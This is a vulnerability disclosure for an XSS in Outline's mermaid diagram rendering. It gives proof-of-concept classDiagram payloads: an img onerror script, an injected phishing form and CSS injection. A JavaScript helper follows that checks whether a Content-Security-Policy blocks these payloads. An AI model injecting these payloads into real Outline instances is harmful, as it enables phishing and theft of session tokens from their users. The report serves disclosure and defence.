XSS in Outline when rendering mermaid diagrams (No Security Impact!)
Summary
Because an outdated mermaid plugin is used to render diagrams, a known XSS in mermaid's classDiagram can be triggered in Outline's mermaid diagrams.
Details
Outline uses mermaid 9.3.0 to render mermaid diagrams. However, this issue discusses an XSS in mermaid versions below 10.9.0 when rendering the node names of a classDiagram: the node name is not fully sanitized, which allows an XSS payload to be injected.
PoC
- Use /Mermaid Diagram to insert the following XSS payload:

    classDiagram
    Class01 <|-- `AveryLongClass<img src='x' onerror=alert(document.domain)>`
    Class03 *-- Class04
    Class05 o-- Class06
    Class07 .. Class08
    Class01 : size()
    Class01 : int chimp
    Class01 : int gorilla

- Open Chrome DevTools; you can see that CSP is blocking the XSS from executing.
- Use the following payload to inject forms for phishing:

    classDiagram Class01 <|-- `<form action='https://google.com'><label for='fname'>First name:</label><br><input type='text' id='fname' name='fname' value='John'><br><label for='lname'>Last name:</label><br><input type='text' id='lname' name='lname' value='Doe'><br><br><input type='submit' value='Submit'></form>`

- Use the following to inject CSS styles:

    classDiagram Class01 <|-- `<h1>inject styles</h1><style>div{color:red!important;font-size:22px;}</style>` Class01 : int gorilla

- The PoC can be found on this page.
Impact
On the official Outline site the XSS is blocked by CSP, but an attacker can still inject an HTML payload for phishing, or use CSS injection to extract a CSRF token. Moreover, if a self-hosted Outline is not configured with a CSP, the XSS will execute.
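The impact above depends on what the deployment's Content-Security-Policy actually covers: the PoC's three payload classes (an inline onerror handler, a form posting to an external origin, an inline style) are governed by script-src, form-action and style-src respectively. The following is an added example, not code from Outline or mermaid, that parses a CSP header and reports which of those three classes it blocks; the form target defaults to the PoC's https://google.com, and keyword sources such as 'self' are assumed not to match an external origin.

```javascript
// Added example (not Outline's or mermaid's code): evaluates whether a
// Content-Security-Policy header mitigates the three payload classes in the
// PoC above: an inline event handler (onerror), an injected <form> posting to
// an external origin, and an injected inline <style>. Upgrading mermaid to
// 10.9.0 or later is the real fix; this check is for defence in depth.

// Parse "directive src src; directive ..." into { directive: [src, ...] }.
function parseCsp(header) {
  const policy = {};
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length > 0) policy[tokens[0].toLowerCase()] = tokens.slice(1);
  }
  return policy;
}

// script-src and style-src fall back to default-src; form-action does not,
// so a policy without form-action leaves form submissions unrestricted.
function effectiveSources(policy, directive) {
  if (policy[directive]) return policy[directive];
  return directive === 'form-action' ? null : policy['default-src'] || null;
}

// Inline code runs when the directive is absent, or when it lists
// 'unsafe-inline' without a nonce or hash source (which would override it).
function allowsInline(sources) {
  if (sources === null) return true;
  const hasNonceOrHash = sources.some((s) => /^'(nonce|sha(256|384|512))-/i.test(s));
  return sources.includes("'unsafe-inline'") && !hasNonceOrHash;
}

// Does a source list permit a given external URL? Keywords ('self', 'none')
// are treated as not matching, since the app's own origin is unknown here.
function allowsOrigin(sources, url) {
  const u = new URL(url);
  return sources.some((s) => {
    if (s === '*' || s === u.protocol) return true;
    if (s.startsWith("'")) return false;
    const host = s.replace(/^[a-z]+:\/\//i, '').replace(/[:/].*$/, '');
    return host.startsWith('*.') ? u.hostname.endsWith(host.slice(1)) : host === u.hostname;
  });
}

function cspCoverage(header, formTarget = 'https://google.com') {
  const policy = parseCsp(header);
  const form = effectiveSources(policy, 'form-action');
  return {
    blocksInlineScript: !allowsInline(effectiveSources(policy, 'script-src')),
    blocksInlineStyle: !allowsInline(effectiveSources(policy, 'style-src')),
    blocksExternalForm: form !== null && !allowsOrigin(form, formTarget),
  };
}
```

A policy that only restricts script-src still leaves the phishing form and CSS injection from the PoC reachable; form-action and a style-src without 'unsafe-inline' are needed for those.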